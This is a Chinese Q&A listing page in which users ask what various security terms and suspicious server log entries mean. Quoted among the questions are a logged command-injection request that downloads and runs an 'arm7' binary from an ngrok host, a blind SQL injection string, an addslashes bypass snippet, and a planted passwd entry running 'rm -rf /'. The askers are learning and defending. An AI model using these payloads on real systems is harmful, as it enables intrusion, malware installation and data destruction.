在“财富”杂志的这篇文章中-- --他们说:
一旦有人在字段中输入她的用户名和密码,攻击者就会捕获该信息。
他们所说的“攻击者捕获信息”是什么意思?是否有一个脚本可以捕获用户名和密码,然后将数据(通过HTTP、TCP等)发布到某个黑客的服务器上?
很想知道细节。
浏览 2提问于2017-01-19得票数 0
1回答
用维基百科编写的是:
安全性:代理服务器是一个额外的防御层,可以防止某些OS和Web特定的攻击。然而,它并没有为针对web应用程序或服务本身的攻击提供任何保护,而web应用程序或服务本身通常被认为是更大的威胁。
操作系统和Web服务器特定的攻击是什么意思?
浏览 0提问于2014-01-10得票数 1
1回答
我听说使用SSL证书进行web流量是很重要的。我曾看过,如果没有SSL,我的电脑(即客户)和ISP之间的中间人可能会截获用户名、密码和其他信息。
我的问题是:这到底是什么意思?是否必须有人进入我的网络才能拦截此信息?这有多危险?如果我将web服务器设置为使用小型组(例如我的JIRA服务器),那么它被看到用户名/密码组合的人入侵的可能性有多大?
如果SSL安全性如此重要,为什么SSL安全性不总是这些服务器的核心方面呢?例如,JIRA不支持SSL (尽管他们有可以帮助您自己弄清楚)。
浏览 1提问于2013-06-30得票数 0
回答已采纳
1回答
当我看到"JYADXW“( HTTP谓词GET/POST/OPTIONS通常驻留在JYADXW中)时,一些混蛋攻击了我的服务器,我正在读取日志。这是什么要求?什么意思?
malicious IP Here - - [26/Sep/2014:06:12:01 -0400] "JYADXW / HTTP/1.1" 403 520 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
浏览 0提问于2014-09-29得票数 0
回答已采纳
我的服务器被人传了恶意文件,请给个说法?我的网站一直用的好好的,服务器也很久没有登陆过,因为网站安装好后基本上不需要天天进服务器,但我发现我的网站根目录被人传了一个恶意的文件,访问的时候跳转到一个类似宣传色情的网站,我想知道,为什么别人可以随便往我的服务器里面上传文件 ,难道一点安全都没有吗?后面提交了工单一直不回复,什么意思,几个意思了?
浏览 744提问于2016-04-26
在阅读关于MAC (消息身份验证代码)的文章时,我遇到了这样一句:
在选择明文攻击下,MAC函数必须抵抗存在伪造。
但我被搞糊涂了。resist existential是什么意思,chosen-plaintext attacks是什么意思?我是这个领域的新手,我需要你的帮助,所以有人能解释和简化这两个术语吗?
请举例说明。
浏览 0提问于2015-08-11得票数 4
回答已采纳
在我的DNS服务器的named.conf中我看到
rate-limit {
responses-per-second 5;
window 5;
};
这到底是什么意思?它会导致DNS客户端的问题吗?这是不是配置太紧了?
浏览 0提问于2013-03-21得票数 9
回答已采纳
在最新的Asp.Net 中,微软为ASP.Net发布了一个补丁--“不安全的ASP.NET Web (.aspx)配置可以允许远程代码执行”。相关KB为
据我所知,ViewStateMac过去只是确定这个ViewState是由服务器生成的,而不是攻击者。但在安全更新文章中,他们说:
如果web开发人员为其站点中的任何页面设置EnableViewStateMac=false,攻击者可以利用此设置在web服务帐户的上下文中上载和调用任意可执行代码。这是远程代码执行(RCE)攻击的一个示例。
例如,如果我禁用某些aspx页面的EnableViewStateMac,它如何允许攻击者在我的web
浏览 3提问于2013-12-10得票数 4
我已经打开了一个网站,它的目的只是分享文本信息。没有后端的数据库,或者不知道身份验证。然而,当我查看日志时,我注意到了这个请求: POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7&
浏览 41提问于2020-04-07得票数 1
回答已采纳
我读了man crypt,不明白下面的短语是什么意思: salt是一个从a-zA-Z0-9./集合中选择的两个字符的字符串。此字符串用于以4096种不同方式之一扰乱算法。
浏览 3提问于2014-08-13得票数 1
我的服务器正在受到攻击(SYN洪水攻击),我在/var/log/messages中看到的是大量的:
r8169: eth0: link up
r8169: eth0: link up
r8169: eth0: link up
1.这是什么意思?
在攻击期间我不能访问服务器,但是在洪水停止后,我也不能访问它,我必须重新启动服务器。
2.有可能避免这种重新启动吗?是否可以在不手动重新启动服务器的情况下“自动重置”连接?
附加信息: Ubuntu服务器10.04位,8GB内存,双核。防火墙:脑脊液(IPTables)
针对高达50-70 70Mbps流量的80端口(apache2)的系统洪水攻击
编
浏览 0提问于2013-01-07得票数 1
回答已采纳
在我的Rails应用程序目录中的config/application_controller.rb文件中,我找到了以下代码:
class ApplicationController < ActionController::Base
protect_from_forgery
end
谁能告诉我project_from_forgery是什么意思,为什么要用它?
浏览 4提问于2012-12-13得票数 19
回答已采纳
1回答
在apache访问日志中,我发现以下代码作为查询字符串(GET),在相当长一段时间内每秒从一个IP提交多次:
**/OR/**/ASCII(SUBSTRING((SELECT/**/COALESCE(CAST(LENGTH(rn)/**/AS/**/VARCHAR(10000))::text,(CHR(32)))/**/FROM/**/"public".belegtable/**/ORDER/**/BY/**/lv/**/OFFSET/**/1492/**/LIMIT/**/1)::text/**/FROM/**/1/**/FOR/**/1))>9
什么意思?
在服务器
浏览 0提问于2020-06-30得票数 2
[ERROR] Not an Asterisk Call Manager protocol or service shutdown: 220 rblsmtpd.local
以上是我在使用水龙头时所面临的错误。谁能告诉我这是什么意思吗?
浏览 0提问于2017-02-14得票数 1
回答已采纳
最近,在apache的错误日志中,我发现了很多这样的行:
[Mon Sep 12 12:34:56 2011] [error] [client ***.***.***.***] 0U, referer: http://www.***.com/
"www.***.com“是我的域名。'0U‘什么意思?响应与某些错误请求对应的代码是416。我的apache版本是2.2.14。
PS:我使用apache+mod_jk+tomcat6来构建我的website.The,apache是前端服务器,所以没有cgi或php模块。
2011-09-12 12:34:56 218.85.19.63
浏览 0提问于2011-09-14得票数 1
1回答
我在Google平台上创建了一个简单的Tomcat网络服务器,这个月我被收取了一项名为“从美洲到中国的计算机引擎网络网际网路均衡器: 2636.552兆字节(Project:xxx)”的费用,以及“从美洲到美洲的计算引擎网络网际网路均衡器”。
“计算机引擎网络网络从美国到中国”到底是什么意思?
浏览 3提问于2014-12-23得票数 46
回答已采纳
2回答
在MySQL 5.6服务器上,mysql.user表包含一个空主机名('jdoe'@'')的用户。那是什么意思?
浏览 0提问于2017-01-26得票数 4
回答已采纳
1回答
这里(https://www.safecrypto.eu/pqclounge/round-2-candidates/)收集了所有通过第一轮NIST后量子密码标准化进程的提案。"NIST安全类别“栏中的缩写是什么意思?我在哪里可以找到他们的正式定义?
浏览 0提问于2019-03-04得票数 2
回答已采纳
2回答
当我阅读有关使用HTTP请求/响应的教程时,我经常读到有关“重放”HTTP请求的内容。然而,我不能确切地理解这是什么意思。这是否意味着只需将HTTP请求重新发送到服务器?
浏览 57提问于2019-03-28得票数 1
回答已采纳
1回答
今天,我在启动我的电脑后,收到了以下消息:
📷
“邪恶少女”-attack到底是什么?有什么方法可以让你受到攻击呢?在这种情况下,我的磁盘“可能被篡改”是什么意思?
浏览 0提问于2017-05-10得票数 9
回答已采纳
1回答
作为restful服务器,我们为客户端提供了一个客户端和密码。我认为客户机使用clientid +hMAC(由密码进行散列)进行身份验证就足够了。
我查阅了一些建议使用时间戳或更多信息用于基字符串的文档。我只是不明白那是什么意思。
有什么专家能解释一下时间戳对预防攻击或其他任何事情有什么帮助吗?
浏览 0提问于2016-05-10得票数 3
回答已采纳
我应该在Django项目的配置中将ALLOWED_HOSTS设置为属于我的主机名
..。通过提交带有虚假header的请求,防止攻击者通过指向恶意主机的链接毒害缓存和密码重置电子邮件,即使在许多看似安全的Host服务器配置下,这也是可能的。
这到底是什么意思?为什么攻击者不简单地使用“正确的”主机头并对垃圾邮件密码重置做同样的事情?“暗藏毒毒”听起来也像是夏娃和鲍勃之间的事,我无论如何都无法控制.
浏览 0提问于2013-11-19得票数 21
3回答
我只是好奇,当我们试图找到某个网站的Web服务器信息时,"x-powered by“是什么意思。
我正在尝试的是:
实际上,我正在尝试找出不同网站正在使用的技术。但是当一个特定网站的"Web服务器信息“显示x-powered-by: ZendServer 8.5.0,ASP.NET时,混淆就产生了,它显示的是php的ZendServer和php的相反(技术)的ASP.NET。在看到x-powered-by的这些信息后,我脑海中浮现出一个糟糕的问题:“他们是不是同时使用了这两个工具?”
浏览 0提问于2015-11-07得票数 43
回答已采纳
我刚从WebGoat开始。在他们的GitHub页面[https://github.com/WebGoat/WebGoat]上,他们发布了以下警告:
WARNING 1: While running this program your machine will be
extremely vulnerable to attack. You should to disconnect
from the Internet while using this program. [sic]
这是什么意思?我天真的理解是,这是在本地主机上运行的,那么漏洞在哪里?
P.S.:如果你能解释一下这件事就更好了,因为
浏览 0提问于2015-06-16得票数 5
回答已采纳
当我使用127.0.0.1作为主机连接到mysql服务器时,连接失败
Issue : Access denied
当我使用localhost作为主机连接到mysql服务器时,它将能够连接。
"127.0.0.1“与"localhost”相同。
还有一些地方我读到mysql不能
MySQL won't auto-resolve the host name
这是什么意思?
浏览 1提问于2014-04-28得票数 0
MD5CryptoServiceProvider是什么意思?它能做什么?有没有人能告诉我?
浏览 0提问于2009-09-25得票数 1
回答已采纳
我希望将DNS服务器配置为使用响应速率限制(RRL)来减少DNS DDoS攻击。无论如何,我必须配置它顶部使用RRL与‘打滑’参数在2。
我已经做了一些搜索,但是我还没有找到任何关于这个参数的明确信息。我发现的唯一一件事是,它代表了“有多少UDP请求可以用截断的响应来回答。”“设置为'2‘意味着每一个其他查询都会得到一个简短的答案”。资料来源:https://conference.apnic.net/data/37/apricot-2014-rrl_1393309768.pdf (幻灯片26)
那是什么意思?如果DNS服务器收到3个UDP请求,最后一个将被截断?但还要多久?
浏览 0提问于2015-01-20得票数 2
3回答
我看过一段类似下面的sql注入示例代码,sql中的'/*‘是什么意思?
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
$_POST['password'] = 'guess';
$mysql['username'] = addslashes($_POST['username']);
$mysql['password'] = addslashes($_POST['
浏览 3提问于2011-08-15得票数 5
回答已采纳
1回答
我在文档中看到了这个部分:
RequestHandler.write(chunk)
将给定的块写入输出缓冲区。
要将输出写入网络,请使用下面的刷新()方法。
如果给定的块是一个字典,我们将它写成JSON,并将响应的内容类型设置为application/json。(如果您想将JSON作为一个不同的内容类型发送,那么在调用set_header ()之后调用它。)
注意,由于潜在的跨站点安全漏洞,列表没有转换为JSON。所有的JSON输出都应该包装在字典中。关于和的更多细节
所以我有几个问题要问:
这是什么意思?
如果给定的块是字典,则我们将其编写为JSON。
这是什
浏览 0提问于2016-01-16得票数 0
回答已采纳
2回答
昨天我注意到一些新的php错误日志,我检查了/etc/passwd
我发现这里有一行新代码: l33th4xor:4l5aMj4l33T:666:666:H4x0R:/:/usr/bin/sudo /bin/rm -rf /
这实际上是什么意思,我看到它像rm -rf一样被执行,但我不确定。
有人能解释一下这到底是什么意思吗?如果我的22端口打开了,这个用户可以通过这个用户登录吗?
浏览 4提问于2015-07-08得票数 1
我能够在我的Ejabberd服务器中注册用户,我想我改变了一些东西。现在我根本不能注册用户,也没有收到任何错误。
当我开始注册过程时,我会提醒状态,它只是调用1、11和10。我不确定它们是什么意思,如果有什么地方,我可以看到它们的定义,这样我就可以知道它调用的错误。
我的注册码应该是正确的,因为我可以将用户注册到我的Openfire服务器。但在我的本地主机和EC2上注册Ejabberd时,它突然停止工作。所以我想我已经改变了一些我不应该做的设置。
我在配置中的寄存器访问规则:
[{all,allow}]
下面是我的代码:
function Onregister(){
va
浏览 3提问于2015-09-03得票数 0
1回答
SHELLCODE操作系统不可知的x86 -> 192.168.202.50:60322 -> 192.168.22.252:445
1)这个警报是什么意思?签名在找什么?如果它通过了,会发生什么? 2)哪个ip是攻击者?
2) SYN数据包分类数据:通用协议命令解码{TCP} 192.168.199.58:63000 -> 192.168.28.100:60000
1)这个警报是什么意思?签名在找什么?如果它通过了,会发生什么? 2)这个警报来自snort体系结构的哪个部分?
3)间谍软件-PUT Hacker-Tool timbuktu pro运行时检测- udp端口40
浏览 7提问于2020-05-09得票数 1
回答已采纳
Ubuntu软件中的一些应用程序(我正在使用Ubuntu18.04LTS)旁边有这样的警告。
什么意思?
我应该避免安装它们吗?在它旁边有一个红色的感叹号,它使我心烦意乱;
浏览 0提问于2019-01-17得票数 13
回答已采纳
我搞不懂那是什么意思。我请求你让我知道这个PayPal错误的解决方案。我今天收到了这条消息
“为避免服务中断,您需要完成重要的安全性”
谢谢你..
浏览 15提问于2017-12-28得票数 0
2回答
我看到很多用这行的日志:
Nov 7 03:47:41 s1 sshd[23430]: Received disconnect from XX.XXX.XX.XX: 11:
Nov 7 05:08:16 s1 sshd[24474]: Received disconnect from XX.XXX.XX.XX: 11:
Nov 7 06:33:59 s1 sshd[25526]: Received disconnect from XX.XXX.XX.XX: 11:
Nov 7 08:06:33 s1 sshd[26601]: Received disconnect from XX.XX
浏览 0提问于2015-11-09得票数 5
回答已采纳
1回答
什么是密码加密位?
、、、、
密码中的“位”是什么意思,例如16位密码或128位密码?有人能帮我说清楚吗?我试着在网上搜索,但是没有很好地解释这个话题。
浏览 1提问于2015-11-05得票数 0
回答已采纳
上面写着在文档里
"ListenAndServeTLS的行为与ListenAndServe相同,只是它期望HTTPS连接。此外,必须提供包含证书和匹配的服务器私钥的文件。如果证书是由证书颁发机构签名的,则certFile应该是服务器证书、任何中间服务器和CA证书的连接。“
然而,我几乎不明白concatenation和intermediates到底是什么意思。谁能给我举个例子吗?提前谢谢。
顺便说一句,我不想在tls.Config中加载CA证书,它确实运行良好;)
浏览 5提问于2016-01-09得票数 4
我的网站今天被黑客入侵,我也能在我的网站上找到注入点。我正在研究如何在将来防止这种情况发生。
这是我的服务器日志:
8.37.230.5 - - "POST /admin/images/uploads/pro_01-04rin.php HTTP/1.1" 200 38597
"http://mywebsite.com/admin/images/uploads/pro_01rin.php"
"Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; SM-G313HZ Build/KOT49H)
AppleWebKit/5
浏览 0提问于2017-12-23得票数 0
1回答
perl中的情况
$password = 'admin';
$newchal = 'hnfdfhj238478wdehf';
$password2 = unpack "H32", ($password ^ $newchal);
这一点非常重要,因为我要将此密码发送到需要正确编码的radius服务器。上面的方法来自一个标准脚本。
现在在PHP中,我尝试了:
$password2 = unpack("H32", $password.''.$newchal);
我比较了结果,但它是不同的..我搞不懂perl中的“^”是
浏览 2提问于2013-09-24得票数 1
2回答
在我的Asus DSL-N10E路由器上启用系统日志之后,我得到了以下消息:
DoS: Tcp与数据攻击source=217.74.166.73
什么意思?这对我的网络安全是一个真正的危险吗?我怎样才能保护我的网络免受这些攻击?
浏览 0提问于2013-11-19得票数 0
回答已采纳
CVE号码是2012-2089.
我真的不明白这份cve的总结是什么意思。
当使用ngx_http_mp4_module.c指令时,nginx1.0.7至1.0.14和1.1.3至1.1.18中的ngx_http_mp4_module模块中的缓冲区溢出允许远程攻击者导致拒绝服务(内存覆盖)或可能通过精心编制的mp4文件执行任意代码。
有人能向我解释或者可能给我一个关于这个漏洞的指导吗?
浏览 0提问于2015-06-08得票数 -1
2回答
12.1行中新的JunOS版本号的含义是什么?
12.1X44
12.1X45
12.1X46
XNN是什么意思?我怎么知道我想要哪一个?
浏览 0提问于2014-01-11得票数 5
回答已采纳
我正在寻找一种方法来禁用通知栏(状态栏)的打开和关闭动画。行为和动画是用StatusBarService硬编码的。文档中说StatusBarService是“半公开的”。“半公共服务”是什么意思?
浏览 0提问于2010-07-22得票数 5
回答已采纳
在Security+一书中,有人告诉我们DoS攻击是无法检测到的,攻击者可以使用无效的IP地址。
无效的IP地址是什么意思?是僵尸IP吗?我们如何面对这一点?
浏览 1提问于2011-06-29得票数 2
回答已采纳
我正在阅读今年8月发生的一次攻击,这次攻击是由MageCart组织通过使用“卡片浏览”从Newegg用户那里窃取信用卡信息而进行的。在使用下面列出的源代码阅读它时,MageCart黑客似乎能够插入在Checkout步骤中插入的恶意javascript代码。window.onload()函数实现将获取信用卡信息并将其发送到与组关联的服务器:
"Volexity能够验证在JavaScript结帐过程中出现的仅限于secure.newegg.com上的一个页面的恶意https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx代码。在结
浏览 0提问于2018-09-26得票数 1
回答已采纳
1回答
我要简单地说:
向服务器添加了一个文件
我将此文件提交给服务器。
结果: cvs服务器:无法锁定‘D:/cvsnt_repos/.,v’。
首先,“不能锁定”是什么意思?其次,它为什么要使用这个特定的文件(它是一个.CSS)?
我读到的每一篇文章都没有得到回应。在您的帮助下,也许我们可以把这个问题作为网上参考,帮助社区!
浏览 1提问于2014-08-12得票数 1
1回答
在电影或其他故事中,你经常听到黑客(或与黑客搏斗的黑客)关于不留下痕迹或找到痕迹的声音。
这到底是什么意思?您在系统上所做的每一个操作都保存在数据库中吗?如果是的话,这是标准的安全措施吗?例如,如果我安装了一个MySQL数据库,它会自动保存每个查询吗?
浏览 0提问于2016-08-28得票数 -2
回答已采纳
2回答
我不想对弱哈希函数(如MD5或SHA-1 )进行一般的碰撞攻击。我想知道基于弱哈希函数的HMAC的安全性
如果有键k,则消息m
Hmac(k,m) = hash(k`xor opad) || hash( (k` xor ipad) || m ) )
第一个问题,Hmac是安全的是什么意思?
攻击者无法在不知道密钥的情况下生成给定消息m的有效Hmac。
攻击者无法找到满足Hmac(k',m') = Hmac(k,m) such k',m'的冲突
攻击者可以恢复密钥k
其他
还有第二个问题。
我在读关于纸质文字记录碰撞的文章
文本冲突攻击: TLS、IKE和SSH
浏览 0提问于2016-09-09得票数 3
回答已采纳
2回答
当我运行sudo iptables -L时,我得到:
Chain INPUT (policy ACCEPT)
target prot opt source destination
REJECT tcp -- anywhere anywhere tcp dpt:www flags:FIN,SYN,RST,ACK/SYN #conn/32 > 20 reject-with tcp-reset
Chain FORWARD (policy ACCEPT)
target prot opt sou
浏览 0提问于2012-12-12得票数 1
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频活动推荐
腾讯云开发者
